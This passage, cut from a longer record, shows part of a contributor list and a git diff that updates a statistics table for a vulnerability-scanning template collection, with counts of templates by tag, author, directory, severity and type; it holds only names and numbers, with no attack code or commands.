(@conspiracyproof)","count":1},{"name":"dwbzn","count":1},{"name":"unblvr1","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"rivalsec","count":1},{"name":"philippdelteil","count":1},{"name":"fpatrik","count":1},{"name":"justmumu","count":1},{"name":"sw0rk17","count":1},{"name":"rumble773","count":1},{"name":"furkansenan","count":1},{"name":"higor melgaço","count":1},{"name":"zhenwarx","count":1},{"name":"hateshape","count":1},{"name":"high","count":1},{"name":"adrianmf","count":1},{"name":"johndoeanonita","count":1},{"name":"retr02332","count":1},{"name":"lark lab","count":1},{"name":"hĂŒseyin tintaƟ","count":1},{"name":"tirtha","count":1},{"name":"domenicoveneziano","count":1},{"name":"hlop","count":1},{"name":"aravind","count":1},{"name":"pussycat0","count":1},{"name":"1nf1n7y","count":1},{"name":"djoevanka","count":1},{"name":"noah @thesubtlety","count":1},{"name":"ola456","count":1},{"name":"rubina119","count":1},{"name":"exceed","count":1},{"name":"0xh7ml","count":1},{"name":"palanichamy_perumal","count":1},{"name":"nuts7","count":1},{"name":"marcio mendes","count":1},{"name":"absshax","count":1},{"name":"kr1shna4garwal","count":1},{"name":"mihail8531","count":1},{"name":"httpvoid","count":1},{"name":"hel10-web","count":1},{"name":"yashvardhantripathi","count":1},{"name":"ahmetpergamum","count":1},{"name":"udyz","count":1},{"name":"ahmed abou-ela","count":1},{"name":"oscarintherocks","count":1},{"name":"petergrifin","count":1},{"name":"vzamanillo","count":1},{"name":"thirukrishnan","count":1},{"name":"sshell","count":1},{"name":"arjunchandarana","count":1},{"name":"will mccardell","count":1},{"name":"zn9988","count":1},{"name":"schniggie","count":1},{"name":"am0nt31r0","count":1},{"name":"phyr3wall","count":1},{"name":"hanlaomo","count":1},{"name":"lady_bug","count":1},{"name":"sospiro","count":1},{"name":"pepitoh","count":1},{"name":"mohammedsaneem","count":1},{"name":"0xtavian","count":1},{"name":"mesaglio","count":1},{"name":"petruknisme","count":1},{"name":"asteria121","count":1},{"name":"joanbonon","count":1},{"name":"ramkrishna sawant","count":1},{"name":"mariam tariq","count":1},{"name":"akshansh","count":1},{"name":"s1r1us","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"b0yd","count":1},{"name":"ndmalc","count":1},{"name":"sorrowx3","count":1},{"name":"ahmed sherif","count":1},{"name":"osamahamad","count":1},{"name":"xeldax","count":1},{"name":"noamrathaus","count":1},{"name":"drfabiocastro","count":1},{"name":"invisiblethreat","count":1},{"name":"karkis3c","count":1},{"name":"jbertman","count":1},{"name":"xstp","count":1},{"name":"olfloralo","count":1},{"name":"ilovebinbash","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"miguelsegoviagil","count":1},{"name":"win3zz","count":1},{"name":"izn0u","count":1},{"name":"0xrod","count":1},{"name":"ryanborum","count":1},{"name":"momen eldawakhly","count":1},{"name":"tangxiaofeng7","count":1},{"name":"kabirsuda","count":1},{"name":"yusakie","count":1},{"name":"tea","count":1},{"name":"j33n1k4","count":1},{"name":"pjborah","count":1},{"name":"aayush vishnoi","count":1},{"name":"matt miller","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"bjhulst","count":1},{"name":"encodedguy","count":1},{"name":"christbowel","count":1},{"name":"sanineng","count":1},{"name":"viondexd","count":1},{"name":"shelld3v","count":1},{"name":"byobin","count":1},{"name":"jacalynli","count":1},{"name":"barthy.koeln","count":1}],"directory":[{"name":"http","count":8042},{"name":"file","count":402},{"name":"cloud","count":325},{"name":"workflows","count":192},{"name":"network","count":137},{"name":"code","count":84},{"name":"javascript","count":65},{"name":"ssl","count":30},{"name":"dast","count":25},{"name":"dns","count":22},{"name":"headless","count":16},{"name":"cves.json","count":1},{"name":"contributors.json","count":1},{"name":"passive","count":1},{"name":"TEMPLATES-STATS.json","count":1}],"severity":[{"name":"info","count":3887},{"name":"high","count":2039},{"name":"medium","count":1742},{"name":"critical","count":1158},{"name":"low","count":280},{"name":"unknown","count":43}],"types":[{"name":"file","count":402},{"name":"dns","count":25}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index b1e0057bf3..ec9f479341 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,5865 +1,5906 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |--------------------------------------------------------|-------|---------------------------------------|-------|----------------------|-------|----------|-------|------|-------| -| cve | 2743 | dhiyaneshdk | 1397 | http | 7977 | info | 3855 | file | 402 | -| panel | 1201 | daffainfo | 866 | file | 402 | high | 2033 | dns | 25 | -| wordpress | 1035 | dwisiswant0 | 802 | cloud | 325 | medium | 1727 | | | -| exposure | 994 | princechaddha | 497 | workflows | 192 | critical | 1145 | | | -| xss | 945 | pussycat0x | 451 | network | 137 | low | 279 | | | -| wp-plugin | 904 | ritikchaddha | 445 | code | 82 | unknown | 43 | | | +| cve | 2773 | dhiyaneshdk | 1420 | http | 8042 | info | 3887 | file | 402 | +| panel | 1212 | daffainfo | 866 | file | 402 | high | 2039 | dns | 25 | +| wordpress | 1046 | dwisiswant0 | 802 | cloud | 325 | medium | 1742 | | | +| exposure | 997 | princechaddha | 498 | workflows | 192 | critical | 1158 | | | +| xss | 956 | ritikchaddha | 455 | network | 137 | low | 280 | | | +| wp-plugin | 915 | pussycat0x | 452 | code | 84 | unknown | 43 | | | | osint | 807 | pikpikcu | 353 | javascript | 65 | | | | | -| tech | 722 | pdteam | 302 | ssl | 30 | | | | | -| lfi | 712 | ricardomaia | 243 | dast | 25 | | | | | -| misconfig | 710 | geeknik | 231 | dns | 22 | | | | | -| rce | 655 | theamanrawat | 214 | headless | 16 | | | | | -| edb | 597 | r3y3r53 | 199 | contributors.json | 1 | | | | | -| packetstorm | 550 | righettod | 179 | TEMPLATES-STATS.json | 1 | | | | | +| tech | 729 | pdteam | 302 | ssl | 30 | | | | | +| misconfig | 713 | ricardomaia | 243 | dast | 25 | | | | | +| lfi | 713 | geeknik | 231 | dns | 22 | | | | | +| rce | 659 | theamanrawat | 214 | headless | 16 | | | | | +| edb | 598 | r3y3r53 | 199 | cves.json | 1 | | | | | +| packetstorm | 550 | righettod | 183 | TEMPLATES-STATS.json | 1 | | | | | | wpscan | 522 | 0x_akoko | 179 | passive | 1 | | | | | -| cve2021 | 493 | gy741 | 168 | cves.json | 1 | | | | | -| cve2022 | 477 | rxerium | 160 | | | | | | | -| wp | 458 | sleepingbag945 | 132 | | | | | | | -| cve2023 | 433 | pdresearch | 128 | | | | | | | -| sqli | 411 | arafatansari | 118 | | | | | | | -| devops | 403 | iamnoooob | 114 | | | | | | | -| unauth | 385 | tess | 109 | | | | | | | -| authenticated | 365 | rootxharsh | 103 | | | | | | | -| cloud | 360 | idealphase | 66 | | | | | | | -| detect | 359 | madrobot | 65 | | | | | | | +| cve2021 | 496 | gy741 | 171 | contributors.json | 1 | | | | | +| cve2022 | 477 | rxerium | 162 | | | | | | | +| wp | 469 | pdresearch | 134 | | | | | | | +| cve2023 | 437 | sleepingbag945 | 132 | | | | | | | +| sqli | 415 | iamnoooob | 121 | | | | | | | +| devops | 403 | arafatansari | 118 | | | | | | | +| unauth | 387 | tess | 109 | | | | | | | +| detect | 371 | rootxharsh | 108 | | | | | | | +| authenticated | 369 | idealphase | 66 | | | | | | | +| cloud | 360 | madrobot | 65 | | | | | | | | file | 345 | zzeitlin | 64 | | | | | | | -| intrusive | 336 | akincibor | 59 | | | | | | | -| login | 328 | for3stco1d | 55 | | | | | | | +| intrusive | 337 | akincibor | 59 | | | | | | | +| login | 337 | for3stco1d | 55 | | | | | | | | kev | 282 | philippedelteil | 52 | | | | | | | -| cve2020 | 257 | securityforeveryone | 52 | | | | | | | -| cve2024 | 248 | johnk3r | 47 | | | | | | | -| token-spray | 243 | gaurang | 42 | | | | | | | -| default-login | 243 | edoardottt | 40 | | | | | | | -| oast | 234 | s4e-io | 36 | | | | | | | -| microsoft | 233 | c-sh0 | 35 | | | | | | | +| cve2024 | 270 | securityforeveryone | 52 | | | | | | | +| cve2020 | 257 | johnk3r | 47 | | | | | | | +| token-spray | 246 | s4e-io | 46 | | | | | | | +| default-login | 245 | gaurang | 42 | | | | | | | +| oast | 236 | edoardottt | 40 | | | | | | | +| microsoft | 235 | c-sh0 | 35 | | | | | | | | top-200 | 229 | j4vaovo | 34 | | | | | | | | config | 227 | mastercho | 32 | | | | | | | | apache | 219 | luisfelipe146 | 31 | | | | | | | | malware | 212 | adam crosser | 31 | | | | | | | | osint-social | 210 | ice3man | 29 | | | | | | | -| azure | 208 | pwnhxl | 28 | | | | | | | +| azure | 209 | pwnhxl | 28 | | | | | | | | network | 202 | ctflearner | 27 | | | | | | | -| token | 194 | parthmalhotra | 24 | | | | | | | -| | 193 | hardik-solanki | 24 | | | | | | | -| azure-cloud-config | 191 | organiccrap | 24 | | | | | | | -| cve2018 | 170 | techbrunchfr | 23 | | | | | | | +| token | 194 | userdehghani | 24 | | | | | | | +| | 193 | parthmalhotra | 24 | | | | | | | +| azure-cloud-config | 191 | hardik-solanki | 24 | | | | | | | +| cve2018 | 170 | organiccrap | 24 | | | | | | | | iot | 169 | harsh | 23 | | | | | | | -| cve2019 | 165 | userdehghani | 23 | | | | | | | +| cve2019 | 166 | techbrunchfr | 23 | | | | | | | | install | 160 | ffffffff0x | 22 | | | | | | | -| keys | 156 | kazgangap | 20 | | | | | | | +| keys | 156 | 0xpugal | 21 | | | | | | | +| auth-bypass | 150 | kazgangap | 20 | | | | | | | | joomla | 148 | sullo | 19 | | | | | | | -| auth-bypass | 147 | cckuailong | 18 | | | | | | | -| redirect | 143 | 0xpugal | 17 | | | | | | | -| tcp | 138 | bhutch | 17 | | | | | | | -| aws | 136 | lu4nx | 17 | | | | | | | -| ssrf | 130 | shaikhyaser | 16 | | | | | | | +| redirect | 146 | cckuailong | 18 | | | | | | | +| tcp | 137 | lu4nx | 17 | | | | | | | +| aws | 136 | bhutch | 17 | | | | | | | +| ssrf | 131 | shaikhyaser | 16 | | | | | | | | amazon | 118 | random-robbie | 16 | | | | | | | | phishing | 117 | unapibageek | 15 | | | | | | | | cms | 115 | sheikhrishad | 15 | | | | | | | | files | 114 | pr3r00t | 15 | | | | | | | -| cve2017 | 113 | r3dg33k | 14 | | | | | | | -| cve2010 | 112 | tenbird | 14 | | | | | | | -| router | 108 | kazet | 14 | | | | | | | -| top-100 | 100 | co5mos | 14 | | | | | | | -| aws-cloud-config | 91 | dogasantos | 14 | | | | | | | -| disclosure | 90 | milo2012 | 14 | | | | | | | -| linux | 85 | theabhinavgaur | 13 | | | | | | | -| seclists | 82 | melbadry9 | 13 | | | | | | | -| code | 81 | sharath | 13 | | | | | | | -| local | 80 | 0ri2n | 13 | | | | | | | -| takeover | 79 | elsfa7110 | 13 | | | | | | | +| cve2017 | 114 | tenbird | 14 | | | | | | | +| cve2010 | 112 | co5mos | 14 | | | | | | | +| router | 108 | dogasantos | 14 | | | | | | | +| top-100 | 100 | r3dg33k | 14 | | | | | | | +| aws-cloud-config | 91 | milo2012 | 14 | | | | | | | +| disclosure | 90 | kazet | 14 | | | | | | | +| linux | 85 | sharath | 13 | | | | | | | +| code | 83 | melbadry9 | 13 | | | | | | | +| seclists | 82 | 0ri2n | 13 | | | | | | | +| local | 80 | theabhinavgaur | 13 | | | | | | | | privesc | 79 | nullfuzz | 13 | | | | | | | -| tokens | 78 | suman_kar | 12 | | | | | | | -| fileupload | 76 | icarot | 12 | | | | | | | -| oracle | 74 | meme-lord | 12 | | | | | | | -| kubernetes | 73 | cyllective | 11 | | | | | | | -| oss | 71 | wdahlenb | 11 | | | | | | | -| js | 70 | hackergautam | 10 | | | | | | | -| cisco | 70 | nadino | 10 | | | | | | | -| enum | 65 | logicalhunter | 10 | | | | | | | -| adobe | 64 | alph4byt3 | 10 | | | | | | | -| ir | 63 | 0x240x23elu | 10 | | | | | | | -| k8s | 62 | random_robbie | 10 | | | | | | | -| huntr | 61 | momika233 | 9 | | | | | | | -| cve2015 | 59 | fabaff | 9 | | | | | | | -| atlassian | 59 | adamcrosser | 9 | | | | | | | -| detection | 57 | olearycrew | 9 | | | | | | | +| takeover | 79 | elsfa7110 | 13 | | | | | | | +| tokens | 78 | meme-lord | 12 | | | | | | | +| fileupload | 76 | suman_kar | 12 | | | | | | | +| oracle | 74 | icarot | 12 | | | | | | | +| kubernetes | 73 | wdahlenb | 11 | | | | | | | +| oss | 71 | cyllective | 11 | | | | | | | +| js | 70 | nadino | 10 | | | | | | | +| cisco | 70 | alph4byt3 | 10 | | | | | | | +| enum | 65 | 0x240x23elu | 10 | | | | | | | +| adobe | 64 | hackergautam | 10 | | | | | | | +| ir | 63 | random_robbie | 10 | | | | | | | +| k8s | 62 | logicalhunter | 10 | | | | | | | +| huntr | 61 | olearycrew | 9 | | | | | | | +| cve2015 | 59 | momika233 | 9 | | | | | | | +| atlassian | 59 | fabaff | 9 | | | | | | | | cve2016 | 57 | initstring | 9 | | | | | | | -| c2 | 57 | oppsec | 9 | | | | | | | -| google | 56 | emadshanab | 9 | | | | | | | -| vmware | 56 | _0xf4n9x_ | 8 | | | | | | | -| tenable | 49 | irshad ahamed | 8 | | | | | | | +| c2 | 57 | adamcrosser | 9 | | | | | | | +| vmware | 57 | oppsec | 9 | | | | | | | +| detection | 57 | emadshanab | 9 | | | | | | | +| google | 56 | that_juan_ | 8 | | | | | | | +| tenable | 49 | nodauf | 8 | | | | | | | | logs | 48 | noraj | 8 | | | | | | | -| cve2014 | 48 | aashiq | 8 | | | | | | | -| log4j | 47 | that_juan_ | 8 | | | | | | | +| cve2014 | 48 | zh | 8 | | | | | | | +| log4j | 47 | _0xf4n9x_ | 8 | | | | | | | | hackerone | 46 | veshraj | 8 | | | | | | | -| php | 46 | nodauf | 8 | | | | | | | -| vulhub | 46 | iamthefrogy | 8 | | | | | | | -| aem | 45 | zh | 8 | | | | | | | -| osint-gaming | 45 | projectdiscoveryai | 7 | | | | | | | -| generic | 45 | leovalcante | 7 | | | | | | | -| debug | 44 | randomstr1ng | 7 | | | | | | | -| cnvd | 44 | hahwul | 7 | | | | | | | -| deserialization | 44 | dr_set | 7 | | | | | | | -| jndi | 44 | its0x08 | 7 | | | | | | | -| oa | 43 | amit-jd | 7 | | | | | | | -| traversal | 43 | techryptic (@tech) | 7 | | | | | | | -| plugin | 42 | kophjager007 | 7 | | | | | | | -| osint-hobby | 42 | tarunkoyalwar | 7 | | | | | | | -| osint-porn | 42 | harshbothra_ | 7 | | | | | | | -| springboot | 41 | divya_mudgal | 7 | | | | | | | -| injection | 40 | amirhossein raeisi | 7 | | | | | | | -| misc | 40 | caspergn | 7 | | | | | | | -| listing | 39 | huta0 | 7 | | | | | | | -| ibm | 39 | megamansec | 6 | | | | | | | -| miscellaneous | 38 | me_dheeraj | 6 | | | | | | | -| | | (https://twitter.com/dheerajmadhukar) | | | | | | | | -| jira | 37 | justaacat | 6 | | | | | | | -| cti | 37 | pathtaga | 6 | | | | | | | -| file-upload | 37 | ja1sh | 6 | | | | | | | -| osint-misc | 35 | xelkomy | 6 | | | | | | | -| fuzz | 35 | lucky0x0d | 6 | | | | | | | -| k8s-cluster-security | 34 | robotshell | 6 | | | | | | | -| sap | 34 | clem9669 | 6 | | | | | | | -| ssl | 33 | praetorian-thendrickson | 6 | | | | | | | -| dlink | 32 | forgedhallpass | 6 | | | | | | | +| debug | 46 | irshad ahamed | 8 | | | | | | | +| vulhub | 46 | aashiq | 8 | | | | | | | +| php | 46 | iamthefrogy | 8 | | | | | | | +| generic | 45 | amit-jd | 7 | | | | | | | +| aem | 45 | divya_mudgal | 7 | | | | | | | +| osint-gaming | 45 | amirhossein raeisi | 7 | | | | | | | +| jndi | 44 | harshbothra_ | 7 | | | | | | | +| cnvd | 44 | projectdiscoveryai | 7 | | | | | | | +| deserialization | 44 | hahwul | 7 | | | | | | | +| traversal | 43 | caspergn | 7 | | | | | | | +| oa | 43 | its0x08 | 7 | | | | | | | +| plugin | 42 | techryptic (@tech) | 7 | | | | | | | +| osint-porn | 42 | leovalcante | 7 | | | | | | | +| osint-hobby | 42 | randomstr1ng | 7 | | | | | | | +| springboot | 41 | tarunkoyalwar | 7 | | | | | | | +| misc | 40 | huta0 | 7 | | | | | | | +| injection | 40 | kophjager007 | 7 | | | | | | | +| ibm | 39 | r3naissance | 7 | | | | | | | +| miscellaneous | 39 | dr_set | 7 | | | | | | | +| listing | 39 | clem9669 | 6 | | | | | | | +| file-upload | 38 | forgedhallpass | 6 | | | | | | | +| jira | 37 | puzzlepeaches | 6 | | | | | | | +| cti | 37 | praetorian-thendrickson | 6 | | | | | | | +| osint-misc | 35 | pentest_swissky | 6 | | | | | | | +| fuzz | 35 | ja1sh | 6 | | | | | | | +| sap | 35 | xelkomy | 6 | | | | | | | +| k8s-cluster-security | 34 | nvn1729 | 6 | | | | | | | +| gitlab | 33 | evan rubinstein | 6 | | | | | | | +| ssl | 33 | pathtaga | 6 | | | | | | | | tls | 32 | byt3bl33d3r | 6 | | | | | | | -| devsecops | 32 | evan rubinstein | 6 | | | | | | | -| wp-theme | 31 | pentest_swissky | 6 | | | | | | | -| osint-tech | 31 | r3naissance | 6 | | | | | | | -| fortinet | 31 | gitlab red team | 6 | | | | | | | -| osint-coding | 30 | nvn1729 | 6 | | | | | | | -| gitlab | 30 | __fazal | 6 | | | | | | | -| api | 30 | devang-solanki | 6 | | | | | | | -| ec2 | 30 | ice3man543 | 6 | | | | | | | -| lfr | 28 | imnightmaree | 6 | | | | | | | -| bestwebsoft | 27 | puzzlepeaches | 6 | | | | | | | -| dns | 27 | isacaya | 5 | | | | | | | -| proxy | 27 | powerexploit | 5 | | | | | | | -| info-leak | 27 | podalirius | 5 | | | | | | | -| citrix | 27 | panch0r3d | 5 | | | | | | | -| ssh | 26 | defr0ggy | 5 | | | | | | | -| manageengine | 26 | arm!tage | 5 | | | | | | | -| zohocorp | 26 | iamnooob | 5 | | | | | | | -| tomcat | 26 | andreluna | 5 | | | | | | | -| admin | 26 | r12w4n | 5 | | | | | | | -| xxe | 26 | gtrrnr | 5 | | | | | | | -| printer | 26 | your3cho | 5 | | | | | | | -| cve2012 | 26 | prajiteshsingh | 5 | | | | | | | -| firewall | 26 | ganofins | 5 | | | | | | | -| dast | 25 | s0obi | 5 | | | | | | | +| devsecops | 32 | __fazal | 6 | | | | | | | +| dlink | 32 | imnightmaree | 6 | | | | | | | +| wp-theme | 31 | megamansec | 6 | | | | | | | +| osint-tech | 31 | robotshell | 6 | | | | | | | +| fortinet | 31 | ice3man543 | 6 | | | | | | | +| api | 30 | me_dheeraj | 6 | | | | | | | +| | | (https://twitter.com/dheerajmadhukar) | | | | | | | | +| ec2 | 30 | justaacat | 6 | | | | | | | +| osint-coding | 30 | gitlab red team | 6 | | | | | | | +| lfr | 28 | devang-solanki | 6 | | | | | | | +| dns | 27 | lucky0x0d | 6 | | | | | | | +| bestwebsoft | 27 | defr0ggy | 5 | | | | | | | +| proxy | 27 | your3cho | 5 | | | | | | | +| citrix | 27 | andreluna | 5 | | | | | | | +| info-leak | 27 | panch0r3d | 5 | | | | | | | +| manageengine | 26 | yanyun | 5 | | | | | | | +| xxe | 26 | ganofins | 5 | | | | | | | +| ssh | 26 | isacaya | 5 | | | | | | | +| printer | 26 | powerexploit | 5 | | | | | | | +| cve2012 | 26 | mr-xn | 5 | | | | | | | +| admin | 26 | adeljck | 5 | | | | | | | +| tomcat | 26 | iamnooob | 5 | | | | | | | +| zohocorp | 26 | arm!tage | 5 | | | | | | | +| firewall | 26 | farish | 5 | | | | | | | +| zoho | 25 | s0obi | 5 | | | | | | | | weaver | 25 | vicrack | 5 | | | | | | | -| zoho | 25 | pulsesecurity.co.nz | 5 | | | | | | | -| prestashop | 25 | king-alexander | 5 | | | | | | | -| osint-finance | 24 | yanyun | 5 | | | | | | | -| yonyou | 24 | farish | 5 | | | | | | | -| osint-images | 24 | kh4sh3i | 5 | | | | | | | -| osint-business | 24 | shine | 5 | | | | | | | -| osint-shopping | 24 | mr-xn | 5 | | | | | | | -| postgresql | 24 | adeljck | 5 | | | | | | | -| cicd | 23 | incogbyte | 4 | | | | | | | +| prestashop | 25 | kh4sh3i | 5 | | | | | | | +| dast | 25 | gtrrnr | 5 | | | | | | | +| postgresql | 24 | prajiteshsingh | 5 | | | | | | | +| osint-shopping | 24 | king-alexander | 5 | | | | | | | +| yonyou | 24 | pulsesecurity.co.nz | 5 | | | | | | | +| osint-finance | 24 | podalirius | 5 | | | | | | | +| osint-business | 24 | r12w4n | 5 | | | | | | | +| osint-images | 24 | shine | 5 | | | | | | | +| stored-xss | 23 | e_schultze_ | 4 | | | | | | | +| cicd | 23 | flx | 4 | | | | | | | | audit | 23 | heeress | 4 | | | | | | | -| stored-xss | 23 | dadevel | 4 | | | | | | | -| s3 | 22 | shankar acharya | 4 | | | | | | | -| github | 22 | ggranjus | 4 | | | | | | | +| github | 22 | tanq16 | 4 | | | | | | | +| s3 | 22 | 0xr2r | 4 | | | | | | | | dashboard | 22 | xxcdd | 4 | | | | | | | | msf | 21 | m4lwhere | 4 | | | | | | | -| ecology | 21 | h1ei1 | 4 | | | | | | | -| weblogic | 21 | cheesymoon | 4 | | | | | | | -| nginx | 20 | dolev farhi | 4 | | | | | | | -| camera | 20 | scent2d | 4 | | | | | | | -| ftp | 20 | tanq16 | 4 | | | | | | | -| jenkins | 20 | cookiehanhoan | 4 | | | | | | | -| wavlink | 20 | jpg0mez | 4 | | | | | | | -| rukovoditel | 19 | lum8rjack | 4 | | | | | | | +| weblogic | 21 | h1ei1 | 4 | | | | | | | +| ecology | 21 | 3th1c_yuk1 | 4 | | | | | | | +| nginx | 20 | k0pak4 | 4 | | | | | | | +| wavlink | 20 | dadevel | 4 | | | | | | | +| camera | 20 | incogbyte | 4 | | | | | | | +| ftp | 20 | joanbono | 4 | | | | | | | +| jenkins | 20 | ggranjus | 4 | | | | | | | | ssti | 19 | omranisecurity | 4 | | | | | | | -| struts | 19 | wisnupramoedya | 4 | | | | | | | -| headless | 19 | joanbono | 4 | | | | | | | -| grafana | 19 | k0pak4 | 4 | | | | | | | -| confluence | 19 | 0xr2r | 4 | | | | | | | -| coldfusion | 19 | flx | 4 | | | | | | | -| vpn | 19 | 3th1c_yuk1 | 4 | | | | | | | -| apt | 19 | e_schultze_ | 4 | | | | | | | -| hp | 19 | nybble04 | 4 | | | | | | | -| nsg | 19 | alifathi-h1 | 3 | | | | | | | -| android | 18 | skeltavik | 3 | | | | | | | -| node.js | 18 | coldfish | 3 | | | | | | | -| xwiki | 18 | emenalf | 3 | | | | | | | -| ruijie | 18 | dudez | 3 | | | | | | | -| osint-music | 18 | c4sper0 | 3 | | | | | | | -| cve2011 | 18 | aringo | 3 | | | | | | | -| backdoor | 18 | imjust0 | 3 | | | | | | | -| bypass | 17 | chae1xx1os | 3 | | | | | | | -| honeypot | 17 | sushantkamble | 3 | | | | | | | -| ivanti | 17 | xianke | 3 | | | | | | | -| backup | 17 | andydoering | 3 | | | | | | | -| magento | 17 | f1tz | 3 | | | | | | | -| mail | 17 | ambassify | 3 | | | | | | | -| zyxel | 17 | soonghee2 | 3 | | | | | | | -| microweber | 17 | arcc | 3 | | | | | | | -| cve2009 | 16 | thomas_from_offensity | 3 | | | | | | | -| jarm | 16 | johnjhacking | 3 | | | | | | | -| netgear | 16 | mailler | 3 | | | | | | | -| service | 16 | eeche | 3 | | | | | | | -| installer | 16 | e1a | 3 | | | | | | | -| alibaba | 16 | davidmckennirey | 3 | | | | | | | -| osint-blog | 16 | randomrobbie | 3 | | | | | | | -| redis | 16 | splint3r7 | 3 | | | | | | | -| setup | 16 | arliya | 3 | | | | | | | -| rconfig | 16 | whoever | 3 | | | | | | | -| status | 16 | lark-lab | 3 | | | | | | | -| cve2013 | 15 | dr0pd34d | 3 | | | | | | | -| nagios | 15 | impramodsargar | 3 | | | | | | | -| docker | 15 | lucasljm2001 | 3 | | | | | | | -| tongda | 15 | taielab | 3 | | | | | | | -| redhat | 15 | yash anand @yashanand155 | 3 | | | | | | | -| woocommerce | 15 | ph33r | 3 | | | | | | | -| cve2008 | 15 | evergreencartoons | 3 | | | | | | | -| mysql | 15 | salts | 3 | | | | | | | -| cnvd2021 | 15 | vagnerd | 3 | | | | | | | -| ruby | 15 | z3bd | 3 | | | | | | | -| seeyon | 15 | parth | 3 | | | | | | | -| java | 15 | binaryfigments | 3 | | | | | | | -| ofbiz | 15 | j3ssie | 3 | | | | | | | -| moosocial | 15 | _generic_human_ | 3 | | | | | | | +| confluence | 19 | cookiehanhoan | 4 | | | | | | | +| nsg | 19 | wisnupramoedya | 4 | | | | | | | +| struts | 19 | cheesymoon | 4 | | | | | | | +| grafana | 19 | dolev farhi | 4 | | | | | | | +| coldfusion | 19 | shankar acharya | 4 | | | | | | | +| hp | 19 | scent2d | 4 | | | | | | | +| headless | 19 | jpg0mez | 4 | | | | | | | +| vpn | 19 | nybble04 | 4 | | | | | | | +| apt | 19 | lum8rjack | 4 | | | | | | | +| rukovoditel | 19 | whoever | 3 | | | | | | | +| ivanti | 18 | charles d | 3 | | | | | | | +| osint-music | 18 | matt galligan | 3 | | | | | | | +| xwiki | 18 | _generic_human_ | 3 | | | | | | | +| cve2011 | 18 | ph33r | 3 | | | | | | | +| ruijie | 18 | z3bd | 3 | | | | | | | +| node.js | 18 | f1tz | 3 | | | | | | | +| backdoor | 18 | shifacyclewala | 3 | | | | | | | +| android | 18 | huowuzhao | 3 | | | | | | | +| honeypot | 17 | chae1xx1os | 3 | | | | | | | +| mail | 17 | dr0pd34d | 3 | | | | | | | +| magento | 17 | persona-twotwo | 3 | | | | | | | +| zyxel | 17 | thabisocn | 3 | | | | | | | +| microweber | 17 | true13 | 3 | | | | | | | +| bypass | 17 | arliya | 3 | | | | | | | +| backup | 17 | j3ssie | 3 | | | | | | | +| error | 17 | c4sper0 | 3 | | | | | | | +| status | 16 | andydoering | 3 | | | | | | | +| service | 16 | binaryfigments | 3 | | | | | | | +| installer | 16 | jarijaas | 3 | | | | | | | +| netgear | 16 | emenalf | 3 | | | | | | | +| setup | 16 | ambassify | 3 | | | | | | | +| rconfig | 16 | 0w4ys | 3 | | | | | | | +| jarm | 16 | mailler | 3 | | | | | | | +| alibaba | 16 | yash anand @yashanand155 | 3 | | | | | | | +| osint-blog | 16 | unstabl3 | 3 | | | | | | | +| cve2009 | 16 | taielab | 3 | | | | | | | +| redis | 16 | xianke | 3 | | | | | | | +| ruby | 15 | eeche | 3 | | | | | | | +| ofbiz | 15 | splint3r7 | 3 | | | | | | | +| redhat | 15 | 0xkayala | 3 | | | | | | | +| moosocial | 15 | sushantkamble | 3 | | | | | | | +| cnvd2021 | 15 | lark-lab | 3 | | | | | | | +| cve2013 | 15 | bernardofsr | 3 | | | | | | | +| woocommerce | 15 | badboycxcc | 3 | | | | | | | +| log | 15 | dudez | 3 | | | | | | | +| nagios | 15 | fxploit | 3 | | | | | | | +| docker | 15 | atomiczsec | 3 | | | | | | | +| mysql | 15 | me9187 | 3 | | | | | | | +| tongda | 15 | soonghee2 | 3 | | | | | | | +| seeyon | 15 | evergreencartoons | 3 | | | | | | | +| cve2008 | 15 | randomrobbie | 3 | | | | | | | +| java | 15 | skeltavik | 3 | | | | | | | +| rds | 14 | alifathi-h1 | 3 | | | | | | | +| dell | 14 | salts | 3 | | | | | | | +| creds-stuffing | 14 | coldfish | 3 | | | | | | | +| windows | 14 | lucasljm2001 | 3 | | | | | | | +| osint-art | 14 | impramodsargar | 3 | | | | | | | +| nodejs | 14 | vagnerd | 3 | | | | | | | +| git | 14 | vsh00t | 3 | | | | | | | +| node | 14 | parth | 3 | | | | | | | +| domainmod | 14 | swissky | 3 | | | | | | | | jboss | 14 | yuzhe-zhang-0 | 3 | | | | | | | -| login-check | 14 | jarijaas | 3 | | | | | | | -| osint-health | 14 | atomiczsec | 3 | | | | | | | -| node | 14 | unstabl3 | 3 | | | | | | | -| creds-stuffing | 14 | fxploit | 3 | | | | | | | -| domainmod | 14 | huowuzhao | 3 | | | | | | | -| git | 14 | 0w4ys | 3 | | | | | | | -| npm | 14 | vsh00t | 3 | | | | | | | -| rds | 14 | badboycxcc | 3 | | | | | | | -| nodejs | 14 | me9187 | 3 | | | | | | | -| smtp | 14 | ekrause | 3 | | | | | | | -| icewarp | 14 | swissky | 3 | | | | | | | -| dell | 14 | 0xkayala | 3 | | | | | | | -| osint-art | 14 | true13 | 3 | | | | | | | -| airflow | 13 | canberbamber | 3 | | | | | | | -| graphql | 13 | fyoorer | 3 | | | | | | | -| laravel | 13 | persona-twotwo | 3 | | | | | | | -| kafka | 13 | thabisocn | 3 | | | | | | | -| hashicorp | 13 | matt galligan | 3 | | | | | | | -| abstractapi | 13 | charles d | 3 | | | | | | | -| instrusive | 13 | bernardofsr | 3 | | | | | | | -| windows | 13 | mavericknerd | 3 | | | | | | | -| fortigate | 13 | shifacyclewala | 3 | | | | | | | -| osint-political | 13 | 8arthur | 2 | | | | | | | -| auth | 13 | nuk3s3c | 2 | | | | | | | -| cuppa | 13 | egemenkochisarli | 2 | | | | | | | -| sonicwall | 13 | convisoappsec | 2 | | | | | | | -| cache | 13 | streetofhackerr007 | 2 | | | | | | | -| cuppacms | 13 | codexlynx | 2 | | | | | | | -| zimbra | 13 | usdag | 2 | | | | | | | -| rails | 13 | liwermor | 2 | | | | | | | -| osint-dating | 13 | w4cky_ | 2 | | | | | | | -| deployments | 12 | 0xsapra | 2 | | | | | | | -| spring | 12 | michal mikolas (nanuqcz) | 2 | | | | | | | -| progress | 12 | s4eio | 2 | | | | | | | -| appservice | 12 | supras | 2 | | | | | | | -| dedecms | 12 | cristi vlad 